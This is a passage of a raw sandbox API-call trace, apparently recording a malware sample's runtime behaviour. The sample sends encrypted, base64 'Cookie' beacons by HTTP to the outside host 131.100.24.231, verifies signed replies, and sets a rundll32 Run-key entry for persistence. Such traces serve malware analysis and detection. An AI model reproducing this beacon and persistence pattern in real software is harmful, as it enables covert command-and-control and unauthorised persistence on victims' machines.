ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0316.219] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0316.219] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0316.219] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0316.219] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0316.219] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0316.219] GetProcessHeap () returned 0x530000 [0316.219] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0316.220] GetProcessHeap () returned 0x530000 [0316.220] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71b8 [0316.220] GetProcessHeap () returned 0x530000 [0316.220] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cce68 [0316.220] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0316.221] GetProcessHeap () returned 0x530000 [0316.221] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71b8 | out: hHeap=0x530000) returned 1 [0316.221] GetProcessHeap () returned 0x530000 [0316.222] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cce68 | out: hHeap=0x530000) returned 1 [0316.222] GetProcessHeap () returned 0x530000 [0316.222] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63030 [0316.222] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0316.222] GetProcessHeap () returned 0x530000 [0316.222] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63030 | out: hHeap=0x530000) returned 1 [0316.222] GetProcessHeap () returned 0x530000 [0316.222] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0316.222] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0316.222] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0316.222] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0316.222] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0316.222] GetProcessHeap () returned 0x530000 [0316.223] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0316.223] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0316.223] GetProcessHeap () returned 0x530000 [0316.223] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bf98 [0316.223] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0316.223] GetProcessHeap () returned 0x530000 [0316.223] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0316.223] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf4b4) returned 0x0 [0316.223] GetProcessHeap () returned 0x530000 [0316.223] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb6) returned 0x2a7ac48 [0316.224] GetProcessHeap () returned 0x530000 [0316.224] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0316.224] GetProcessHeap () returned 0x530000 [0316.224] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0316.224] CryptBinaryToStringW (in: pbBinary=0x2a7ac48, cbBinary=0xb6, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0316.224] GetProcessHeap () returned 0x530000 [0316.224] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1ea) returned 0x2acc570 [0316.224] CryptBinaryToStringW (in: pbBinary=0x2a7ac48, cbBinary=0xb6, dwFlags=0x40000001, pszString=0x2acc570, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTj/RRgAHPF1Li1DjnI+f5FjnN9J2E/8=", pcchString=0x2cf504) returned 1 [0316.224] GetProcessHeap () returned 0x530000 [0316.224] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0316.225] GetProcessHeap () returned 0x530000 [0316.225] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63058 [0316.225] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: lYRmxj=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTj/RRgAHPF1Li1DjnI+f5FjnN9J2E/8=\r\n") returned 261 [0316.225] GetProcessHeap () returned 0x530000 [0316.225] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63058 | out: hHeap=0x530000) returned 1 [0316.225] GetProcessHeap () returned 0x530000 [0316.225] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc570 | out: hHeap=0x530000) returned 1 [0316.225] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0316.226] GetProcessHeap () returned 0x530000 [0316.226] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0316.226] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0316.227] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="yBEEnKhBylvRxCnDmpAEUlWSNeIXgbrnpn", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0316.227] GetProcessHeap () returned 0x530000 [0316.227] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0316.227] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0316.228] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0316.228] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0316.228] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: lYRmxj=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTj/RRgAHPF1Li1DjnI+f5FjnN9J2E/8=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0317.369] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0317.369] GetProcessHeap () returned 0x530000 [0317.369] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0317.369] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x275) returned 1 [0317.369] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b48075, dwNumberOfBytesToRead=0xfd8b, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b48075*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0317.369] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0317.369] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0317.369] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0317.369] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0317.369] GetProcessHeap () returned 0x530000 [0317.369] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bf98 [0317.369] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bf98, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bf98, pcbResult=0x2cf51c) returned 0x0 [0317.369] GetProcessHeap () returned 0x530000 [0317.370] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72c0 [0317.370] GetProcessHeap () returned 0x530000 [0317.370] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0317.370] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0317.370] GetProcessHeap () returned 0x530000 [0317.370] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72c0 | out: hHeap=0x530000) returned 1 [0317.370] GetProcessHeap () returned 0x530000 [0317.371] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0317.371] GetProcessHeap () returned 0x530000 [0317.371] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62ea0 [0317.371] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0317.371] GetProcessHeap () returned 0x530000 [0317.371] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62ea0 | out: hHeap=0x530000) returned 1 [0317.371] GetProcessHeap () returned 0x530000 [0317.371] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7a948 [0317.371] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7a948, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7a948) returned 0x0 [0317.371] BCryptHashData (in: hHash=0x2a7a950, pbInput=0x58bfe0, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7a950) returned 0x0 [0317.371] BCryptFinishHash (in: hHash=0x2a7a950, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7a950, pbOutput=0x2cf510) returned 0x0 [0317.371] BCryptDestroyHash (in: hHash=0x2a7a950 | out: hHash=0x2a7a950) returned 0x0 [0317.372] GetProcessHeap () returned 0x530000 [0317.372] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7a948 | out: hHeap=0x530000) returned 1 [0317.372] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0317.372] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bf9c, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0317.373] GetProcessHeap () returned 0x530000 [0317.374] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c6c0 [0317.374] GetProcessHeap () returned 0x530000 [0317.374] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0317.374] GetProcessHeap () returned 0x530000 [0317.374] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0317.375] GetProcessHeap () returned 0x530000 [0317.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0317.375] GetProcessHeap () returned 0x530000 [0317.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0317.375] GetProcessHeap () returned 0x530000 [0317.375] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0317.375] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0317.375] GetProcessHeap () returned 0x530000 [0317.376] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83b60 [0317.376] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",oZXKVIjb") returned 98 [0317.376] GetProcessHeap () returned 0x530000 [0317.376] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83b60 | out: hHeap=0x530000) returned 1 [0317.376] GetProcessHeap () returned 0x530000 [0317.376] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bf98 [0317.376] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x630, lpdwDisposition=0x0) returned 0x0 [0317.376] GetProcessHeap () returned 0x530000 [0317.377] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0317.377] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",oZXKVIjb") returned 98 [0317.377] RegSetValueExW (in: hKey=0x630, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",oZXKVIjb", cbData=0xc6 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",oZXKVIjb") returned 0x0 [0317.377] RegCloseKey (hKey=0x630) returned 0x0 [0317.377] GetProcessHeap () returned 0x530000 [0317.378] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c6c0 | out: hHeap=0x530000) returned 1 [0317.378] GetProcessHeap () returned 0x530000 [0317.378] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0317.378] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xea926) returned 0x102 [0327.777] GetProcessHeap () returned 0x530000 [0327.777] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71b8 [0327.778] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0327.778] GetProcessHeap () returned 0x530000 [0327.778] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71b8 | out: hHeap=0x530000) returned 1 [0327.778] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0327.778] GetProcessHeap () returned 0x530000 [0327.778] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71b8 [0327.778] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0327.778] GetProcessHeap () returned 0x530000 [0327.778] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71b8 | out: hHeap=0x530000) returned 1 [0327.778] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b60 [0327.780] FindNextFileW (in: hFindFile=0x2a83b60, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0327.780] FindNextFileW (in: hFindFile=0x2a83b60, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0327.781] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0327.781] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0327.781] FindNextFileW (in: hFindFile=0x2a83b60, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0327.781] FindClose (in: hFindFile=0x2a83b60 | out: hFindFile=0x2a83b60) returned 1 [0327.781] GetProcessHeap () returned 0x530000 [0327.781] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0327.781] GetProcessHeap () returned 0x530000 [0327.781] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71b8 [0327.781] GetProcessHeap () returned 0x530000 [0327.781] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0327.782] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0328.725] GetProcessHeap () returned 0x530000 [0328.725] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71b8 | out: hHeap=0x530000) returned 1 [0328.725] GetProcessHeap () returned 0x530000 [0328.725] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0328.725] GetProcessHeap () returned 0x530000 [0328.725] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62ea0 [0328.725] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0328.725] GetProcessHeap () returned 0x530000 [0328.726] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62ea0 | out: hHeap=0x530000) returned 1 [0328.726] GetProcessHeap () returned 0x530000 [0328.726] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0328.726] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0328.726] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0328.726] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0328.726] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0328.726] GetProcessHeap () returned 0x530000 [0328.726] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0328.726] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0328.726] GetProcessHeap () returned 0x530000 [0328.727] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bf98 [0328.727] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0328.727] GetProcessHeap () returned 0x530000 [0328.727] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0328.727] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf4b4) returned 0x0 [0328.727] GetProcessHeap () returned 0x530000 [0328.727] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb0) returned 0x2a34c98 [0328.727] GetProcessHeap () returned 0x530000 [0328.728] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0328.728] GetProcessHeap () returned 0x530000 [0328.728] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0328.728] CryptBinaryToStringW (in: pbBinary=0x2a34c98, cbBinary=0xb0, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0328.728] GetProcessHeap () returned 0x530000 [0328.728] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1da) returned 0x2acc570 [0328.729] CryptBinaryToStringW (in: pbBinary=0x2a34c98, cbBinary=0xb0, dwFlags=0x40000001, pszString=0x2acc570, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTtpVhcYAgW6FDbOB4ynxfe4=", pcchString=0x2cf504) returned 1 [0328.729] GetProcessHeap () returned 0x530000 [0328.729] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0328.729] GetProcessHeap () returned 0x530000 [0328.729] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f68 [0328.735] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: 